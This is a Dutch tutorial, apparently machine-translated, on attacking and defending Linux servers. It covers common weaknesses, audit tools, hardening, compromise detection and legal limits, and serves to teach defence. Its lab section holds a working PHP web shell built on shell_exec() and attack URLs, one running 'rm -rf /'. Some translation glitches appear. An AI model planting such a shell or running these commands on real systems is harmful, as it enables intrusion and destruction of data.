Handleiding voor Linux-hacking: Ubuntu Opdrachten en tools

⚡ Slimme samenvatting

Linux-hacking is de praktijk van het vinden en exploiteren van zwakke punten in Linux-systemen. Deze pagina legt uit op welke kwetsbaarheden aanvallers zich richten, welke audittools daarbij betrokken zijn en welke maatregelen een server beschermen.

  • ???? Waarom het uitmaakt: Linux is het besturingssysteem waarop de meeste webservers en cloudworkloads draaien, waardoor het een aantrekkelijk doelwit is.
  • 🔍 Afweging bij open source: Openbare broncode helpt beheerders om snel patches uit te brengen en helpt aanvallers bij het opsporen van kwetsbaarheden.
  • 🧰 Auditinstrumenten: Nessus, Nmap, Lynis en OpenVAS Onthul open poorten, ontbrekende patches en zwakke configuraties.
  • ???? Aanvalsvectoren: Zwakke SSH-inloggegevens, niet-gepatchte kernels, verkeerde configuratie en webshells zijn de belangrijkste oorzaken van beveiligingslekken.
  • 🛡️ Verharding: Patchbeheer, SSH-beveiliging, het principe van minimale bevoegdheden en verplichte toegangscontrole verminderen de blootstelling aanzienlijk.
  • 🚨 Detectie: Auditlogboeken, controles op de integriteit van bestanden en inbraakdetectie sporen een inbreuk op voordat de schade zich kan verspreiden.

Linux Hacking Tutorial

Linux is het meest gebruikte serverbesturingssysteem, met name voor webservers. Het is open source, wat betekent dat iedereen de broncode kan lezen. Die transparantie werkt twee kanten op: beheerders gebruiken het om snel fouten te vinden en te verhelpen, terwijl aanvallers dezelfde code bestuderen op zoek naar zwakke punten om te misbruiken. Linux-hacking is de praktijk van het misbruiken van die zwakke punten om ongeautoriseerde toegang tot een systeem te verkrijgen.

De onderstaande secties behandelen wat Linux is, de beveiligingslekken die het besturingssysteem treffen en een praktische kennismaking met hacken. Ubuntuen de tegenmaatregelen die u kunt treffen.

Snelle opmerking over Linux

Linux is een open source besturingssysteem. Veel distributies zijn erop gebaseerd, waaronder Red Hat Enterprise Linux, Fedora, Debian, en UbuntuOmdat de broncode openbaar is, kunnen onderzoekers, leveranciers en aanvallers deze allemaal inspecteren. Aanvallers gebruiken die toegang om te zoeken naar kwetsbaarheden die misbruikt kunnen worden, terwijl diezelfde transparantie ervoor zorgt dat beheerders sneller patches kunnen uitbrengen dan bij gesloten platforms vaak het geval is. Linux draait als besturingssysteem voor servers, desktops, tablets en mobiele apparaten.

Linux-programma's kunnen worden bediend via een grafische interface of via de commandoregel. Werken via de commandoregel is sneller en nauwkeuriger dan klikken in een grafische gebruikersinterface, en daarom geven beveiligingstesters die werken aan distributies zoals Kali Linux Ze brengen vrijwel al hun tijd door in een terminal. Kennis van de basiscommando's is daarom een ​​praktische vereiste.

Raadpleeg dit Linux-zelfstudie voor de basisprincipes, en voor de Kali Linux zelfstudie voor de op beveiliging gerichte distributie die daarop is gebouwd.

Veelvoorkomende beveiligingslekken en aanvalsvectoren in Linux

Aanvallen op Linux maken zelden gebruik van exotische exploits. Telemetriegegevens uit 2025 en 2026 laten zien dat de meeste inbreuken tracWe gaan terug naar een kleine reeks terugkerende zwakke punten, en als je die kent, weet je waar je je verdedigingsinspanningen als eerste op moet richten.

  • Zwakke of hergebruikte SSH-inloggegevens — Brute-force-aanvallen en pogingen tot het misbruiken van inloggegevens tegen SSH-verbindingen die toegankelijk zijn via internet, vormen het overgrote deel van de vijandige activiteiten die op Linux-systemen worden waargenomen.
  • Onopgeloste kernel- en pakketfouten — Het Linux-kernelteam werd in 2024 een CVE Numbering Authority, en het aantal gerapporteerde kernel-CVE's steeg van ongeveer 290 in 2023 tot meer dan 3,500 het jaar daarop, waardoor de achterstand in patches snel oploopt.
  • Verkeerde configuratie — Standaardaccounts, overbodige daemons, bestanden met schrijfrechten voor iedereen en soepele sudo-regels verlenen privileges die zonder exploit verkregen konden worden.
  • Kwetsbare webapplicaties — gebreken zoals SQL injectie Cross-site scripting stelt een aanvaller in staat om de server te bereiken via de applicatie in plaats van via het besturingssysteem. Webshells zijn het meest voorkomende kwaadaardige artefact dat wordt aangetroffen op gecompromitteerde Linux-servers.
  • Privilege-escalatiebugs — lokale kwetsbaarheden die een beperkt account root-toegang geven. Sommige hiervan zijn meer dan tien jaar onopgemerkt in de kernel gebleven voordat ze aan het licht kwamen.
  • Risico's in de toeleveringsketen en afhankelijkheidsrisico's — Pakketten van derden, taalbibliotheken en containerimages importeren code die door niemand in het operationele team is beoordeeld.

Geen van deze methoden vereist dat een aanvaller Linux zelf uitschakelt. Analyses van inbraken in 2025 toonden aan dat ongeveer vier op de vijf inbraken helemaal geen malware bevatten, maar in plaats daarvan gebaseerd waren op verkeerde configuratie en gestolen inloggegevens.

Linux-hacktools

Beveiligingstesters en systeembeheerders gebruiken dezelfde scanners: de een om zwakke punten te vinden voordat een aanvaller dat doet, de ander om te controleren of de oplossingen effectief zijn. De onderstaande tools worden het meest gebruikt om een ​​Linux-host te controleren.

Gereedschap Type Vergunning Typisch gebruik op Linux
Nessus Kwetsbaarheidscanner Zakelijk Scant configuratie-instellingen, ontbrekende patches en netwerkservices in gemengde omgevingen.
Nmap Netwerk- en poortscanner Open source Identificeert hosts die op een server draaien, de services die ze beschikbaar stellen en welke poorten open staan.
Lynis Hostcontrole en -beveiliging Open source Voert een audit uit van een draaiend systeem aan de hand van beveiligingsnormen en rapporteert specifieke herstelmaatregelen.
OpenVAS Kwetsbaarheidscanner Open source Netwerkkwetsbaarheidsscans, uitgevoerd door Greenbone als onderdeel van de Community Edition.

De lijst is niet volledig; het geeft een idee van de beschikbare instrumenten voor audits. Ubuntu en andere Linux-systemen. Oudere handleidingen bevelen nog steeds SARA aan, de Security Auditor's Research Assistant, maar de laatste versie dateert uit 2009 en de projectwebsite is offline, dus Lynis en OpenVAS zijn de onderhouden alternatieven.

Hackactiviteit: Hack a Ubuntu Linux-systeem met PHP

In dit praktische scenario bekijken we hoe een Linux-host via een webapplicatie kan worden bereikt, met PHP als voorbeeld. Er wordt geen fysiek slachtoffer aangevallen. Als je het wilt uitproberen, installeer dan LAMPP, de Linux-versie van XAMPP, op je eigen computer.

PHP Het programma bevat twee functies die gebruikt kunnen worden om besturingssysteemopdrachten uit te voeren: exec() en shell_exec(). De functie exec() retourneert de laatste regel van de opdrachtuitvoer, terwijl shell_exec() het volledige resultaat van de opdracht als een tekenreeks retourneert.

Laten we voor de demonstratie aannemen dat een aanvaller erin slaagt het volgende bestand naar een webserver te uploaden.

<?php

$cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l';

echo "executing shell command:-> $cmd</br>";

$output = shell_exec($cmd);

echo "<pre>$output</pre>";

?>

HIER,

Het bovenstaande script haalt de opdracht uit de GET-variabele met de naam cmd. De opdracht wordt uitgevoerd met shell_exec() en het resultaat wordt in de browser weergegeven.

De bovenstaande code kan op de volgende manier worden misbruikt: URL

http://localhost/cp/konsole.php?cmd=ls%20-l

HIER,

  • “…konsole.php?cmd=ls%20-l” kent de waarde ls –l toe aan de variabele cmd.

Het commando op de Ubuntu De server wordt daarom uitgevoerd als

shell_exec('ls -l') ;

Het uitvoeren van de bovenstaande code op een webserver levert een resultaat op dat vergelijkbaar is met het volgende.

Browseruitvoer van een PHP-script dat de inhoud van een directory en de bestandsrechten weergeeft. Ubuntu server

De uitvoer toont eenvoudigweg de bestanden in de huidige map en hun machtigingen.

Stel nu dat de aanvaller in plaats daarvan het volgende commando geeft.

rm -rf /

HIER,

  • Met "rm" verwijder je bestanden.
  • "rf" zorgt ervoor dat het rm-commando recursief wordt uitgevoerd, waardoor alle mappen en bestanden worden verwijderd.
  • “/” geeft aan dat het commando moet beginnen met verwijderen vanuit de hoofdmap.

De aanval URL Het zou er ongeveer zo uitzien:

http://localhost/cp/konsole.php?cmd=rm%20-rf%20/

Eén niet-gevalideerde parameter is dus al voldoende om een ​​aanvaller alle privileges te geven die het webserveraccount bezit. De twee volgende secties zijn bedoeld om dat te voorkomen en om het op te vangen als preventie niet lukt.

Hoe voorkom je hacks op Linux?

Linux-hacking maakt gebruik van kwetsbaarheden in het besturingssysteem en de software die daarop draait. Een organisatie kan de volgende maatregelen, in combinatie toegepast, nemen om de meeste van de hierboven beschreven kwetsbaarheden te dichten.

  • Patchbeheer — Patches verhelpen de bugs die aanvallers misbruiken om een ​​systeem te compromitteren. Een vastgesteld beleid zorgt ervoor dat relevante updates snel worden toegepast, in plaats van wanneer iemand er pas aan denkt.
  • Juiste OS-configuratie — Schakel inactieve gebruikersaccounts en onnodige daemons uit. Wijzig de standaardinstellingen, waaronder standaardgebruikersnamen, wachtwoorden voor gedeelde applicaties en standaardpoortnummers.
  • SSH-beveiliging — Schakel root-aanmelding en wachtwoordverificatie uit, sta alleen benoemde gebruikers of groepen toe en beperk het aantal authenticatiepogingen. Dit sluit het meest aangevallen toegangspunt op Linux af.
  • Minste privilege — Geef accounts en services alleen de rechten die ze nodig hebben en beperk sudo tot specifieke commando's in plaats van algemene beheerdersrechten.
  • Verplichte toegangscontrole — behoud SELinux (Red Hat-familie) of AppArmor (Debian en Ubuntu) in de handhavingsmodus, zodat een gecompromitteerde service geen toegang heeft tot de rest van het systeem.
  • Invoervalidatie — De bovenstaande demonstratie werkt alleen omdat de aanvraaggegevens een shellfunctie bereiken. Geef nooit gebruikersinvoer door aan exec() of shell_exec().
  • Firewalls en segmentatie — stel alleen de poorten beschikbaar die een service daadwerkelijk nodig heeft, met behulp van een firewall en netwerksegmentatie om te beperken wat een gecompromitteerde host kan bereiken.
  • Intrusion detection systems Dergelijke tools kunnen worden gebruikt om ongeautoriseerde toegang tot het systeem te detecteren, en sommige kunnen de poging ook blokkeren.
  • Geteste back-ups — Offline, herstelbare back-ups zorgen ervoor dat een destructieve opdracht zoals de bovenstaande resulteert in een uitval in plaats van een permanent verlies.

Hoe detecteer je een gecompromitteerd Linux-systeem?

Preventie faalt uiteindelijk, dus de tweede vraag is hoe snel je het zou merken. Detectie op Linux is afhankelijk van het verzamelen van het juiste bewijsmateriaal vóór een incident plaatsvindt, niet erna.

  • Auditregistratie — Het kernel-auditframework, auditd, registreert privilegegebruik, bestandstoegang en systeemoproepen in een vorm die een gecompromitteerd proces niet ongemerkt kan herschrijven. Stuur deze logs door van de host naar een centrale collector.
  • Authenticatielogboeken — Een reeks mislukkingen gevolgd door één succes in /var/log/auth.log of /var/log/secure is het klassieke kenmerk van een brute-forceaanval.
  • Onverwachte processen en verbanden — Een afluisterdienst of uitgaande verbinding waar niemand een verklaring voor kan geven, verdient onmiddellijk onderzoek.
  • Monitoring van bestandsintegriteit — tools die systeembinaries en configuratiebestanden hashen, signaleren wijzigingen in bestanden die nooit zouden mogen veranderen.
  • Geplande taken en opstartitems — Persistentie wordt meestal opgeslagen in cronjobs, systemd-units of shellprofielscripts.
  • Nieuwe of gewijzigde accounts — zoek naar onbekende gebruikers, een tweede account met UID 0 en SSH-sleutels die niemand heeft toegevoegd.
  • Webservermappen Omdat webshells de meest voorkomende kwaadaardige bestanden zijn die op Linux-servers worden aangetroffen, verdienen onverwachte scriptbestanden onder een webroot extra aandacht.
  • Geplande audits — Voer een audittool voor de host, zoals Lynis, volgens een vast schema uit en beschouw elk rapport als een takenlijst in plaats van een eenmalige actie.

Als u bewijs vindt van een inbreuk, isoleer dan de host, bewaar de logbestanden en een schijfkopie voordat u iets wijzigt, en herstel het systeem vanaf een betrouwbaar medium in plaats van te proberen een werkend systeem te reinigen. De afhandeling van dit bewijsmateriaal wordt behandeld in [verwijzing naar context]. digitaal forensisch onderzoek.

Juridische en ethische grenzen van Linux-hacking

Elke techniek op deze pagina mag legaal worden toegepast op systemen die u bezit of waarvoor u schriftelijke toestemming hebt om te testen, en is vrijwel overal elders illegaal. De bovenstaande oefening wordt juist om die reden bewust uitgevoerd op een lokale installatie.

  • Schriftelijke toestemming — Een ondertekende beschrijving van de opdracht, een afgesproken testperiode en een aangewezen contactpersoon: dat is wat een penetratietest onderscheidt van een misdrijf. Mondelinge goedkeuring is niet voldoende.
  • Blijf binnen het bereik — Hosts, adresbereiken en technieken die niet in de lijst staan, zijn niet toegestaan, zelfs niet als ze bereikbaar zijn.
  • Ga zorgvuldig om met gegevens. — bewijsmateriaal dat tijdens een test is verzameld, bevat nog steeds echte persoonsgegevens en moet daarom veilig worden opgeslagen en daarna worden vernietigd.
  • Rapporteer op verantwoorde wijze — Deel de bevindingen met de eigenaar en geef hem de tijd om het probleem op te lossen voordat je iets publiceert.

De juridische risico's zijn reëel: ongeautoriseerde toegang tot een computersysteem is een strafbaar feit volgens wetten zoals de Amerikaanse Computer Fraud and Abuse Act en de Britse Computer Misuse Act. Als je een carrière wilt opbouwen met deze vaardigheden, kies dan voor een erkende route — een veiligheidscertificering En bovendien een eigen lab, in plaats van de server van iemand anders.

Veelgestelde vragen

Linux profiteert van een strikte scheiding tussen gebruikers en desktops en een kleiner aanvalsoppervlak, waardoor het veel minder te maken krijgt met standaardmalware. Blootstelling aan servers is een ander verhaal: Linux-hosts die met internet verbonden zijn, worden constant aangevallen en de kwaliteit van de configuratie bepaalt de uitkomst.

Signature scanning is nuttig voor bestands- en mailservers die content voor andere platforms verwerken. Voor de meeste Linux-hosts bieden patches, beveiligingsmaatregelen en loggebaseerde detectie meer waarde, aangezien de meeste inbraken helemaal geen malwarebestand bevatten.

Machine learning-modellen brengen het normale proces-, inlog- en netwerkgedrag op een host in kaart en signaleren vervolgens afwijkingen die door vaste regels over het hoofd worden gezien, zoals een webserveraccount dat een shell start. Aanvallers gebruiken dezelfde technieken om hun verkenning te versnellen, dus beide partijen zijn in beweging.

GitHub-copiloot Het kan, indien direct gevraagd, suggesties doen voor geparameteriseerde query's en veiligere alternatieven voor shell-aanroepen. Het wordt getraind op openbare code, dus de suggesties moeten nog worden beoordeeld — beschouw het als een hulpmiddel voor het opstellen van een eerste versie, niet als een beveiligingsscanner.

Beide zijn gebaseerd op Debian, maar Kali Linux Het apparaat wordt geleverd met honderden vooraf geïnstalleerde beveiligings- en forensische tools en is gebouwd voor testdoeleinden. Ubuntu Het is een algemene distributie voor desktops en servers en is de betere keuze voor dagelijks gebruik.

Voer beveiligingsupdates minimaal maandelijks uit, en binnen enkele dagen voor kritieke updates of updates waarvan bekend is dat ze misbruikt kunnen worden. Schakel automatische beveiligingsupgrades in en plan herstarts zodat kernelpatches daadwerkelijk van kracht worden.

Begin met een Linux-beheerderscertificaat zoals LPIC of RHCSA, voeg daar CompTIA Security+ aan toe en ga vervolgens over op praktische penetratietesten of beheer. tracks. Guru99 houdt een lijst bij van cyberbeveiligingscertificeringen met de huidige eisen.

Gebruik een virtuele machine op je eigen hardware, of een erkend trainingsplatform zoals ProbeerHackMewaarbij de doelen precies voor dit doel zijn bedoeld. Test nooit een systeem dat niet uw eigendom is zonder schriftelijke toestemming.

Vat dit bericht samen met: